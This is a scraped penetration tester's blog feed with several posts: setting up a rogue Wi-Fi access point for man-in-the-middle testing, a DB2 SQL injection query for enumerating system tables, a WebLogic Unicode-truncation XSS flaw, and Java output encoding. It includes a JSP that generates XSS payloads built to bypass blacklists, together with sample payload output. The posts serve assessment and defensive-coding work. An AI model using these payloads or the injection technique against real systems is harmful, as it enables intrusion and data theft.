<h3>Create a Virtual Machine Wireless Access Point</h3>I created a new Ubuntu Virtual Machine to act as my MiTM Wireless Access Point with VirtualBox as the host. I like the virtual machine approach because I can save the state and start anew with each new assessment and I can run it on my laptop which makes my mobile environment more portable. This requires a wireless card that is USB, runs in Ubuntu, and can be put into Monitor mode. The Alfa cards work great for this, they are high power (mine is 2000mW), and fairly inexpensive.<br />
<br />
<br />
<br />
<center><br />
<iframe frameborder="0" marginheight="0" marginwidth="0" scrolling="no" src="http://rcm.amazon.com/e/cm?t=autonacom-20&o=1&p=8&l=as1&asins=B005ETA5K2&ref=tf_til&fc1=000000&IS2=1&lt1=_blank&m=amazon&lc1=0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="height: 240px; width: 120px;"></iframe><br />
</center><br />
<br />
Once your Ubuntu is installed and have a wireless card that works you need to install hostapd. It's the software that will make your VM act like an access point. You also need to create one NAT'ed Network adaptor in the VirtualBox config. <b style="font-style: italic;">I could not get this to work correctly unless it was NAT'ed. </b>The Alfa drivers come with its own custom version of hostap. If you are using the Alfa then proceed to the next section. If not you should be able to get away with just running <i>sudo apt-get install hostapd.</i><br />
<br />
<h3>Installing the Alfa Drivers (Skip this section if not using the Alfa )</h3>If your using the wireless card mentioned above then you also need to install the drivers from the Alfa website. The divers can be downloaded <a href="http://www.alfa.com.tw/in/front/bin/ptlist.phtml?Category=105397" target="_blank">here</a>. Once downloaded and unziped you will need to build the driver.<br />
<span style="font-family: 'Courier New', Courier, monospace;">> cd [ALFA ROOT]/driver</span><br />
Unzip and untar the driver and cd into the created directory structure and run the following commands.<br />
<span style="font-family: 'Courier New', Courier, monospace;">>make</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">>sudo make install</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Your driver should be installed and to test reboot the machine and see if the Alfa can connect to the internet. In virtual box i had to create a USB filter so that the VM can see the device. This is pretty simple and the Alpha shows up in the list when you click Add USB in the USB Virtual Box config.</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-8mbPlq_uBGc/T38hx-YSqVI/AAAAAAAACtA/Wj0bAdat4J0/s1600/AlfaUsb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="http://2.bp.blogspot.com/-8mbPlq_uBGc/T38hx-YSqVI/AAAAAAAACtA/Wj0bAdat4J0/s320/AlfaUsb.jpg" width="320" /></a></div><span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<h2><span style="font-family: Arial, Helvetica, sans-serif;">Install HostAp for Alfa</span></h2><div><span style="font-family: Arial, Helvetica, sans-serif;">The downloaded drivers have a custom hostap that needs to be built to use this card. You need to </span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> cd [ALFA ROOT] /wpa_supplicant_hostapd/</span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> unzip wpa_supplicant_hostapd-0.8_rtw_20110524.zip</span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> cd wpa_supplicant_hostapd-0.8</span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> cd hostap</span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> make</span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> sudo make install</span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> </span><span style="font-family: 'Courier New', Courier, monospace;">cd [ALFA ROOT] /wpa_supplicant_hostapd/</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">> cp rtl_hostapd.conf ~/</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">> cd ~</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<h3><span style="font-family: Arial, Helvetica, sans-serif;">Configure HostAp</span></h3></div><span style="font-family: Arial, Helvetica, sans-serif;">Now your ready to start your AP. You can configure your access point inside rtl_hostapd.conf or /etc/hostap/hostapd.conf if your not using the Alfa Drivers. In this file ensure that the interface is correct, change the ssid, and change the password. Below is an example of the only things I needed to configure.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">interface=wlan0</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">ctrl_interface=/var/run/hostapd</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">ssid=MALLORY_VM</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">wpa_passphrase=thisisatest</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">channel=6</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">wpa=2</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">bridge=br0</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Run your access point by typing:</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">> sudo hostapd ./rtl_hostapd.conf</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">You should be able to see your wireless access point show up on your mobile devices. In Part 2 we will discuss the installation of Mallory and getting it to MiTM any device that connects to the wireless AP.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-2410549130005981530.post-43482169844436924382011-09-13T09:48:00.001-05:002011-09-13T09:48:12.516-05:00DB2 SQL Injection : Select the Nth row without cursors<p>Well I've looked all over the net for this solution and I could not find the answer so after much trial an error I was able to build my own solution. Lets say you need to query one row at a time from DB2 and you cannot use cursors and specifically you need to query sysibm.systables. I came up with this solution and there may be a more elegant way but this worked.</p> <blockquote> <p><font color="#0000ff" face="Courier New">select * from ( <br />        select * from systables order by name asc fetch first 1 rows only <br />) as G order by name desc fetch first 1 rows only</font></p> <p><font color="#0000ff" face="Courier New">select * from ( <br />        select * from systables order by name asc fetch first 2 rows only <br />) as G order by name desc fetch first 1 rows only</font></p> <p><font color="#0000ff" face="Courier New">select * from ( <br />        select * from systables order by name asc fetch first <font color="#0000ff">3</font> rows only <br />) as G order by name desc fetch first 1 rows only</font></p> <p><font color="#0000ff" face="Courier New">...</font></p> <p><font color="#0000ff" face="Courier New">...</font></p> <p><font color="#0000ff" face="Courier New">select * from ( <br />        select * from systables order by name asc fetch first 1000 rows only <br />) as G order by name desc fetch first 1 rows only</font></p> </blockquote> <p><font color="#0000ff" face="Courier New"></font></p> <p>I put the below query into a vulnerable parameter sent to a website and used burp intruder to iterate through each row by incrementing N.</p> <blockquote> <p><font color="#0000ff" face="Courier New">select * from ( <br />        select * from systables order by name asc fetch first <strong><font color="#ff0000">N</font></strong> rows only <br />) as G order by name desc fetch first 1 rows only</font></p> </blockquote> <p><font color="#000000" face="Arial">The query works by first requesting N number of rows with the data ordered ascending and thus putting the Nth row on the bottom of the Result Set. Next query the Result Set ordered desc so that the Nth row is now at the top of the Result Set and fetch the first row. The Result Set will then return the Nth row you need without having to define cursors. </font></p> <p><font color="#000000" face="Arial"><a href="http://lh3.ggpht.com/-aibnTYqBtE0/Tm9tKT9KNPI/AAAAAAAACjA/jIPmCeDYqpg/s1600-h/burp%252520intrude1%25255B4%25255D.jpg"><img style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="burp intrude1" border="0" alt="burp intrude1" src="http://lh6.ggpht.com/-c7oogpIAGAM/Tm9tK98HSYI/AAAAAAAACjE/LMCEPJXfAj8/burp%252520intrude1_thumb%25255B2%25255D.jpg?imgmax=800" width="765" height="615" /></a></font></p> <p><font color="#000000" face="Arial"> </font></p> Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2410549130005981530.post-12995211231158275192011-04-28T17:10:00.000-05:002011-04-28T17:10:06.596-05:00Hacking 101 with Tracer-T<div class="separator" style="clear: both; text-align: center;"><object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://3.gvt0.com/vi/SXmv8quf_xM/0.jpg"><param name="movie" value="http://www.youtube.com/v/SXmv8quf_xM&fs=1&source=uds" /><param name="bgcolor" value="#FFFFFF" /><embed width="320" height="266" src="http://www.youtube.com/v/SXmv8quf_xM&fs=1&source=uds" type="application/x-shockwave-flash"></embed></object></div>This makes me laugh every time I watch it. I still cannot figure out if the kid is joking or serious.Unknownnoreply@blogger.com7tag:blogger.com,1999:blog-2410549130005981530.post-32344087732433800972011-03-27T22:21:00.001-05:002011-03-29T00:30:17.949-05:00Roku hidden features.<div style="float: right"> <iframe src="http://rcm.amazon.com/e/cm?t=autonacom-20&o=1&p=8&l=as1&asins=B00426C56U&ref=qf_sp_asin_til&fc1=000000&IS2=1&lt1=_blank&m=amazon&lc1=0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe> </div> <p>I finally bought a Roku device today and immediately went looking for development resources. I was surprised to find they have and SDK you can download for free and you don’t need to pay anything to distribute your app as long as your distributing it for free. You can easily put your device into ‘Development Mode’ and this Development mode lets you upload code directly to the device though an HTTP interface and also enables a telnet port for which you can step through/debug the code. I think it’s great that you have the option to run the code locally on your own device or create a private channel so that only a select few can see it, or make it public (i.e. every one in the world). I’m still new into this but i can’t help but wonder what their app review process is like to ensure malware-like apps are not being distributed but i’ll get more into that at a later date.</p> <p>All of this is cool and I can’t wait to make my own channel but the other really cool trick it can do is act as a network sniffer! It has the option to enable tcpdump that will cycle through up to 4 dump files. These are all available via its web interface. This could be fun just to leave running for a few days to see what turns up. </p> <p>Be forewarned, there doesn’t seem to be any security around this stuff once its enabled though. No password is required to access any of these features once they are enabled but you must use the remote to enable them. Its like putting in the cheat codes to old Nintendo games. UP,UP,DN,DN, Left,Right,Left,Right, B,A…. </p> <p>The channel code is written in BrightScript which is completely new to me. It looks alot, well exactly, like VB Script. I have never been a big fan of languages that don’t end lines in semi-colons. Probably because I started learning programming in C. I was actually kinda expecting sometime more java like. That was more wishfully thinking on my part I guess.</p> <p>Since its got tcpdump built into it lets see if i can port RADAR over to it. :P</p> Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2410549130005981530.post-2913722474592848482011-03-25T02:12:00.002-05:002011-03-25T15:11:40.057-05:00Hack Like in the Movies… with RADARI have just started a new (possibly open source) project/experiment to perform 3D modeling of network traffic and networking events in near realtime. My idea was to give the users the freedom of movement similar to a First Person Shooter (WASD controls) and the ability to better visualize how attacks interact with the network. Some things are just more apparent when you have a different view. <br />
<h3>Introducing RADAR</h3><h2></h2>RADAR is written in Java using openGL so that it should be easy to port to any system. It has a built in network sniffer and currently only nmap integration. It currently listens to network traffic and will animate information about all devices it finds on the network including open ports, whois, HTTP request/responses, etc. When complete it will have the ability to record, playback, pause, rewind, and slow down these events in the animation. <br />
RADAR represents all IP devices as 3d orbs and places them in rings that somewhat represent subnets but basically anything that matches the first two octets goes into a ring group at this point (may be better later on). All orbs can be clicked to display detailed information about what’s communicating with the host. It displays a parsed out view of the pcap data by row and when a row is selected a view of the actual hexdump is visible. This can better be explained by the video below.<br />
<div class="wlWriterEditableSmartContent" id="scid:5737277B-5D6D-4f48-ABFC-DD9C333F4C5D:35b4f3ec-144b-4d10-8e5c-2472d76c49ed" style="display: block; float: none; margin: 0px auto; padding: 0px; width: 425px;"><div id="92be0368-1143-417a-8b61-459a0ce3b619" style="display: inline; margin: 0px; padding: 0px;"><div><a href="http://www.youtube.com/watch?v=kaQR58XC7qk" target="_new"><img alt="" galleryimg="no" onload="var downlevelDiv = document.getElementById('92be0368-1143-417a-8b61-459a0ce3b619'); downlevelDiv.innerHTML = "<div><object width=\"425\" height=\"355\"><param name=\"movie\" value=\"http://www.youtube.com/v/kaQR58XC7qk&hl=en\"><\/param><embed src=\"http://www.youtube.com/v/kaQR58XC7qk&hl=en\" type=\"application/x-shockwave-flash\" width=\"425\" height=\"355\"><\/embed><\/object><\/div>";" src="http://lh4.ggpht.com/_acrzuhZS74A/TYxAVdpW_-I/AAAAAAAACU0/tKPhtP7Hx98/video3e2f6aef6499%5B3%5D.jpg?imgmax=800" style="border-style: none;" /></a></div></div></div><h3> </h3><h3>Download Coming Soon…</h3>Soon as I feel comfortable with it I will release a version that any of you out there can try out.Unknownnoreply@blogger.com7tag:blogger.com,1999:blog-2410549130005981530.post-53470086510892601972008-12-17T00:22:00.006-06:002008-12-17T01:05:10.024-06:00WebLogic and Non-English Character Sets<p>I want to discuss more in depth about the vulnerability <a href="http://coding-insecurity.blogspot.com/">Matt Presson</a> and I have been working on. Apparently if you have a Weblogic server  and you accept international characters but you have the page encoding set to ISO 8859-1 then you are vulnerable to a whole mess of xss attacks and any script listed in my previous blog post will execute. What seems to happen, we are still trying to find the exact cause, is that the web server will truncate the upper bytes when returning the request. so if you entered 0x013C the response will contain 0x3C which is of course '<' and freakin vulnerable ;) This will get past the default output encoding that is done in <bean:write which uses the function <strong>ResponseUtils.filter()</strong> to actually do all of its output encoding. If your use <b>StringEscapeUtils.escapeHtml()</b> from <a href="http://commons.apache.org/lang/">apache commons lang</a> then all your output will be encoded correctly and this is demonstrated by the war file Matt Presson released.</p> <p>I also modified Matt's code so that the regular POST is also vulnerable. The ajax post was vulnerable because it called encodeURIComponent from javascript. If you set the form to <strong>accept-charset="UTF-8" </strong>then the data will be encoding the same as with <strong>encodeURIComponent</strong>.</p> <pre> <form name="dataForm" id="form" method="POST" action="/International/execute/Display" accept-charset="UTF-8"></pre><br /><br /><p>Below is a video of the the attack being exploited both in ajax and in a regular post.</p><br /><embed id="VideoPlayback" src="http://video.google.com/googleplayer.swf?docid=-7065727101541575347&hl=en&fs=true" style="width:400px;height:326px" allowFullScreen="true" allowScriptAccess="always" type="application/x-shockwave-flash"> </embed><br /><p>I have currently tested this on tomcat and glassfish and was unable to get the same results so it seems to primarily be a weblogic issue. </p><br /><p>I would like to thank Gareth Heyes for giving me a hacker tag in <a href="http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php">hackvertor</a> to perform this expoit.!!!!</p>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2410549130005981530.post-45893789054173234862008-10-23T11:40:00.003-05:002008-10-23T23:08:28.485-05:00Why not to use Blacklists.<p>I was looking at Matt Presson's Blog article about executing scripts with foreign char sets and decided to write my own JSP to generate every XSS that could be executed with foreign characters. This is a perfect example of why not to use blacklist. A simple whitelist or better proper output encoding (mentioned in my last post) will thwart these attempts.</p> <blockquote> <p><font color="#004080"><%@ page language="java" contentType="text/html; charset=UTF-8" <br />    pageEncoding="UTF-8"%> <br /><%@page import="org.apache.commons.lang.StringEscapeUtils" %> <br /><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "</font><a href="http://www.w3.org/TR/html4/loose.dtd""><font color="#004080">http://www.w3.org/TR/html4/loose.dtd"</font></a><font color="#004080">> <br /><html> <br /><head> <br /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <br /><title>Insert title here</title> <br /></head> <br /><body> <br /><% <br />for(long i=0; i< 0x100; i++) <br />{ <br />    long lt = 0x3C; <br />    long gt = 0x3E; <br />    long order = i << 8; <br />    long LT = order | lt; <br />    //out.println(Long.toHexString(LT) + " : "); <br />    long GT = order | gt; <br />    //out.println(Long.toHexString(GT) + "<BR>"); <br />    String theScript = (char)LT + "script" + (char)GT + "alert(" + i + ");" +(char)LT + "/script" + (char)GT; <br />    out.println( theScript + "<br>"); <br />} </font></p> <p><font color="#004080">%> <br /></body> <br /></html></font></p> <p> </p> </blockquote> <p>This will generate 256 different versions of javascript to bypass blacklist input validation attempts. Here are a few examples. They may not display properly on this blog so i recommend running it on your own tomcat server.</p> <blockquote> <p>ļscriptľalert(1);ļ/scriptľ <br />ȼscriptȾalert(2);ȼ/scriptȾ <br />̼script̾alert(3);̼/script̾ <br />мscriptоalert(4);м/scriptо <br />ԼscriptԾalert(5);Լ/scriptԾ <br />ؼscriptؾalert(6);ؼ/scriptؾ <br />ܼscriptܾalert(7);ܼ/scriptܾ <br />࠼script࠾alert(8);࠼/script࠾ <br />़scriptाalert(9);़/scriptा <br />਼scriptਾalert(10);਼/scriptਾ <br />଼scriptାalert(11);଼/scriptା <br />఼scriptాalert(12);఼/scriptా <br />഼scriptാalert(13);഼/scriptാ <br />scriptalert(14);/script <br />༼script༾alert(15);༼/script༾ <br />ြscriptှalert(16);ြ/scriptှ <br />ᄼscriptᄾalert(17);ᄼ/scriptᄾ <br />ሼscriptሾalert(18);ሼ/scriptሾ <br />ጼscriptጾalert(19);ጼ/scriptጾ <br />ᐼscriptᐾalert(20);ᐼ/scriptᐾ <br />ᔼscriptᔾalert(21);ᔼ/scriptᔾ <br />ᘼscriptᘾalert(22);ᘼ/scriptᘾ <br />scriptalert(23);/script <br />ᠼscriptᠾalert(24);ᠼ/scriptᠾ <br />scriptalert(25);/script <br />ᨼscriptᨾalert(26);ᨼ/scriptᨾ <br />ᬼscriptᬾalert(27);ᬼ/scriptᬾ <br />᰼script᰾alert(28);᰼/script᰾ <br />ᴼscriptᴾalert(29);ᴼ/scriptᴾ <br />ḼscriptḾalert(30);Ḽ/scriptḾ <br />ἼscriptἾalert(31);Ἴ/scriptἾ <br />‼script‾alert(32);‼/script‾ <br />ℼscriptℾalert(33);ℼ/scriptℾ <br />∼script∾alert(34);∼/script∾ </p></blockquote> Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2410549130005981530.post-31837636891401431172008-10-20T15:42:00.005-05:002008-10-23T23:09:27.829-05:00What do you mean no Java output encoding !!!<p>I hear all the time that java does not have any good encoding libraries but have used some frameworks that do seem to encode the output properly. If anyone uses the struts framework and implements it properly then all your output is encoded properly if you use the following methods to output data. </p> <p> </p> <blockquote> <table border="0" cellspacing="0" cellpadding="2" width="636"><tbody> <tr> <td valign="top" width="634"> <p><bean:write name="secData" property="username"/><br> <br />    <html:link href="./test.jsp" paramId="test" paramName="secData" paramProperty="username" > <bean:write name="secData" property="username"/></html:link><br> <br />    <html:hidden name="secData" property="username" /> <br></p> </td> </tr> </tbody></table> </blockquote> <p>The tag libraries bead:write, html:hidden, and html:link will all output either url encoded output for html:link (which creates an anchor tag) and html:hidden or will entity encode your output for bean:write. </p> <p> </p> <p><strong>What if your not using struts you ask?</strong></p> <p>Well this is great if you are using struts 1 and struts 2 (output tags are different for struts 2) but what you are not or you are writing servlets that generate html dynamically. This is not a problem. I dug a little deeper into struts to see what struts was doing and if there is a way to leverage this for other sites that do not use this framework. The URL encoding is simply URLEncode.encode( your string, your format). Its uses a default java class that has been around since 1.5. Just import java.net.URLEncoder. </p> <p> </p> <p><em>Example:</em></p> <p>String output = URLEncoder.encode("your String" , "UTF-8");</p> <p>  </p> <p>Struts 1 is using an entity encoder built specifically into the struts framework. The entity encoding is using a struts class called ResponseUtils. So you could import this class and still not use the struts MVC architecture. </p> <p><em>Example:</em> </p> <p>String output = org.apache.struts.util.ResponseUtils.filter("your string");</p> <p> </p> <p>Struts 2 does entity encoding by using a class TextUtils from WebWork. Import org.opensymphony.xwork2.util.TextUtils</p> <p><em>Example:</em></p> <p>String output = org.opensymphony.xwork2.util.TextUtils.htmlEncode("your string", true);</p> <p> </p> <p><strong>Proper Encoding with international Chars!!!!</strong></p> <p>There are other encoding options provided by the apache commons lang library. This is library is probably the most useful. To get it to properly encode international chars to the screen you need to first unescape the html before to escape the html. import org.apache.commons.lang.StringEscapeUtils;</p> <p> </p> <p><em>Example:</em></p> <p>String Output = StringEscapeUtils.escapeHtml(StringEscapeUtils.unescapeHtml(input));</p> <p> </p> <p>Below is an example screenshot of the all above encodings in a simple servlet. Notice that StringEscapeUtils (the last one) will properly encode the xss attempt plus the Chinese  character set. This will solve the problem all you java developers have with output encoding international characters and can quit complaining that there isn't any good encoding options for java. =) My source code is attached here: <a title="http://my-security-projects.googlecode.com/files/testEncoding.war" href="http://my-security-projects.googlecode.com/files/testEncoding.war">http://my-security-projects.googlecode.com/files/testEncoding.war</a> </p> <p> </p> <p>I hope this finally answers everyone's concerns for international character encoding in java. I'll let you all out there in the hacker community see if you can find a way to get past this model. Let me know if you do</p> <p> </p> <p><a href="http://lh5.ggpht.com/ascetik/SPztQ8aNRHI/AAAAAAAAA-w/brWmclt75ac/s1600-h/image%5B12%5D.png"><img style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" border="0" alt="image" src="http://lh4.ggpht.com/ascetik/SPztSeJiAYI/AAAAAAAAA-0/eCe2yyYhuNY/image_thumb%5B8%5D.png?imgmax=800" width="1244" height="856" /></a> </p> <p> </p> <p>Here is the page source:</p> <blockquote> <br /><table border="0" cellspacing="0" cellpadding="2" width="400"><tbody> <tr> <td valign="top" width="400"> <font color="#800000"><html><body></font> <br /> <font color="#800000"><h1> Servlet Test </h1></font> <br /> <font color="#800000"><br><b>Input String: </b> <strong><font color="#ff0000"><script>alert('xss');</script></font></strong> &#29615;&#29699;&#32463;&#27982;&#19981;&#26223;</font> <br /> <font color="#800000">&#27668;&#20013;&#22269;&#32463;&#27982;&#22686;&#38271;&#25918;&#32531; &#20013;&#22269;&#32463;&#27982;</font> <br /> <font color="#800000">&#22312;&#29615;&#29699;&#19981;&#26223;&#27668;&#19979;&#21576;&#29616;&#25918;&#32531;&#24577;&#21183;</font> <br /> <font color="#800000">&#65292;&#26368;&#26032;&#22269;&#20869;&#29983;&#20135;&#24635;&#20540;&#22686;&#38271;&#20026;9.9%&#65292;</font> <br /> <font color="#800000">&#36890;&#32960;&#25345;&#32493;&#25918;&#32531;&#12290; &#20013;&#22269;&#20061;&#26376;&#36152;&#26131;</font> <br /> <font color="#800000">&#30408;&#20313;&#21019;&#32426;&#24405; &#35775;&#35848;&#65306;&#20013;&#22269;&#22806;&#36152;&#21069;</font> <br /> <font color="#800000">&#26223;&#19981;&#23481;&#20048;&#35266; &#37329;&#34701;&#39118;&#26292;&#65306;&#20013;&#22269;&#38754;</font> <br /> <font color="#800000">&#20020;&#30340;&#21361;&#26426;&#19982;&#26426;&#36935; </font> <br /> <font color="#800000"><br></font> <br /> <font color="#800000"><b>java.net.URLEncoded: </b><strong><font color="#ff0000">%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E</font></strong>+++</font> <br /> <font color="#800000">%26%2329615%3B%26%2329699%3B%26%2332463%3B%26%2327982%3B%26%2319981%3B%26%2326223%3B</font> <br /> <font color="#800000">%26%2327668%3B%26%2320013%3B%26%2322269%3B%26%2332463%3B%26%2327982%3B%26%2322686%3B</font> <br /> <font color="#800000">%26%2338271%3B%26%2325918%3B%26%2332531%3B+%26%2320013%3B%26%2322269%3B%26%2332463</font> <br /> <font color="#800000">%3B%26%2327982%3B%26%2322312%3B%26%2329615%3B%26%2329699%3B%26%2319981%3B%26%2326223</font> <br /> <font color="#800000">%3B%26%2327668%3B%26%2319979%3B%26%2321576%3B%26%2329616%3B%26%2325918%3B%26%2332531</font> <br /> <font color="#800000">%3B%26%2324577%3B%26%2321183%3B%26%2365292%3B%26%2326368%3B%26%2326032%3B%26%2322269</font> <br /> <font color="#800000">%3B%26%2320869%3B%26%2329983%3B%26%2320135%3B%26%2324635%3B%26%2320540%3B%26%2322686</font> <br /> <font color="#800000">%3B%26%2338271%3B%26%2320026%3B9.9%25%26%2365292%3B%26%2336890%3B%26%2332960%3B%26</font> <br /> <font color="#800000">%2325345%3B%26%2332493%3B%26%2325918%3B%26%2332531%3B%26%2312290%3B+%26%2320013%3B</font> <br /> <font color="#800000">%26%2322269%3B%26%2320061%3B%26%2326376%3B%26%2336152%3B%26%2326131%3B%26%2330408</font> <br /> <font color="#800000">%3B%26%2320313%3B%26%2321019%3B%26%2332426%3B%26%2324405%3B+%26%2335775%3B%26</font> <br /> <font color="#800000">%2335848%3B%26%2365306%3B%26%2320013%3B%26%2322269%3B%26%2322806%3B%26%2336152%3B%26</font> <br /> <font color="#800000">%2321069%3B%26%2326223%3B%26%2319981%3B%26%2323481%3B%26%2320048%3B%26%2335266%3B+</font> <br /> <font color="#800000">%26%2337329%3B%26%2334701%3B%26%2339118%3B%26%2326292%3B%26%2365306%3B%26%2320013%3B</font> <br /> <font color="#800000">%26%2322269%3B%26%2338754%3B%26%2320020%3B%26%2330340%3B%26%2321361%3B%26%2326426%3B</font> <br /> <font color="#800000">%26%2319982%3B%26%2326426%3B%26%2336935%3B+</font> <br /> <font color="#800000"><br></font> <br /> <font color="#800000"><b>(apache commons lang) org.apache.commons.lang.StringEscapeUtils: </b><font color="#ff0000">&lt;script&gt;alert('xss');&lt;/script&gt;</font> </font> <br /> <font color="#800000">&amp;#29615;&amp;#29699;&amp;#32463;&amp;#27982;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#20013;&amp;#22269;&amp;#32463;</font> <br /> <font color="#800000">&amp;#27982;&amp;#22686;&amp;#38271;&amp;#25918;&amp;#32531; &amp;#20013;&amp;#22269;&amp;#32463;&amp;#27982;&amp;#22312;</font> <br /> <font color="#800000">&amp;#29615;&amp;#29699;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#19979;&amp;#21576;&amp;#29616;&amp;#25918;&amp;#32531;</font> <br /> <font color="#800000">&amp;#24577;&amp;#21183;&amp;#65292;&amp;#26368;&amp;#26032;&amp;#22269;&amp;#20869;&amp;#29983;&amp;#20135;&amp;#24635;</font> <br /> <font color="#800000">&amp;#20540;&amp;#22686;&amp;#38271;&amp;#20026;9.9%&amp;#65292;&amp;#36890;&amp;#32960;&amp;#25345;&amp;#32493;&amp;#25918;</font> <br /> <font color="#800000">&amp;#32531;&amp;#12290; &amp;#20013;&amp;#22269;&amp;#20061;&amp;#26376;&amp;#36152;&amp;#26131;&amp;#30408;&amp;#20313;</font> <br /> <font color="#800000">&amp;#21019;&amp;#32426;&amp;#24405; &amp;#35775;&amp;#35848;&amp;#65306;&amp;#20013;&amp;#22269;&amp;#22806;&amp;#36152;</font> <br /> <font color="#800000">&amp;#21069;&amp;#26223;&amp;#19981;&amp;#23481;&amp;#20048;&amp;#35266; &amp;#37329;&amp;#34701;&amp;#39118;&amp;#26292;</font> <br /> <font color="#800000">&amp;#65306;&amp;#20013;&amp;#22269;&amp;#38754;&amp;#20020;&amp;#30340;&amp;#21361;&amp;#26426;&amp;#19982;&amp;#26426;</font> <br /> <font color="#800000">&amp;#36935; </font> <br /> <font color="#800000"><br></font> <br /> <font color="#800000"><b>(struts-core-1.3.8.jar) org.apache.struts.util.ResponseUtils: </b><strong><font color="#ff0000">&lt;script&gt;alert(&#39;xss&#39;);&lt;/script&gt;</font></strong> </font> <br /> <font color="#800000">&amp;#29615;&amp;#29699;&amp;#32463;&amp;#27982;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#20013;&amp;#22269;&amp;#32463;</font> <br /> <font color="#800000">&amp;#27982;&amp;#22686;&amp;#38271;&amp;#25918;&amp;#32531; &amp;#20013;&amp;#22269;&amp;#32463;&amp;#27982;&amp;#22312;</font> <br /> <font color="#800000">&amp;#29615;&amp;#29699;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#19979;&amp;#21576;&amp;#29616;&amp;#25918;&amp;#32531;</font> <br /> <font color="#800000">&amp;#24577;&amp;#21183;&amp;#65292;&amp;#26368;&amp;#26032;&amp;#22269;&amp;#20869;&amp;#29983;&amp;#20135;&amp;#24635;</font> <br /> <font color="#800000">&amp;#20540;&amp;#22686;&amp;#38271;&amp;#20026;9.9%&amp;#65292;&amp;#36890;&amp;#32960;&amp;#25345;&amp;#32493;&amp;#25918;</font> <br /> <font color="#800000">&amp;#32531;&amp;#12290; &amp;#20013;&amp;#22269;&amp;#20061;&amp;#26376;&amp;#36152;&amp;#26131;&amp;#30408;&amp;#20313;</font> <br /> <font color="#800000">&amp;#21019;&amp;#32426;&amp;#24405; &amp;#35775;&amp;#35848;&amp;#65306;&amp;#20013;&amp;#22269;&amp;#22806;&amp;#36152;</font> <br /> <font color="#800000">&amp;#21069;&amp;#26223;&amp;#19981;&amp;#23481;&amp;#20048;&amp;#35266; &amp;#37329;&amp;#34701;&amp;#39118;&amp;#26292;</font> <br /> <font color="#800000">&amp;#65306;&amp;#20013;&amp;#22269;&amp;#38754;&amp;#20020;&amp;#30340;&amp;#21361;&amp;#26426;&amp;#19982;&amp;#26426;</font> <br /> <font color="#800000">&amp;#36935; </font> <br /> <font color="#800000"><br></font> <br /> <font color="#800000"><b>(xwork) com.opensymphony.xwork2.util.TextUtils with spec chars: </b><strong><font color="#ff0000">&lt;script&gt;alert('xss');&lt;/script&gt;</font></strong> </font> <br /> <font color="#800000">&amp;#29615;&amp;#29699;&amp;#32463;&amp;#27982;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#20013;&amp;#22269;&amp;</font> <br /> <font color="#800000">#32463;&amp;#27982;&amp;#22686;&amp;#38271;&amp;#25918;&amp;#32531; &amp;#20013;&amp;#22269;&amp;#32463;&amp;#27982;</font> <br /> <font color="#800000">&amp;#22312;&amp;#29615;&amp;#29699;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#19979;&amp;#21576;&amp;#29616;&amp;#25918;</font> <br /> <font 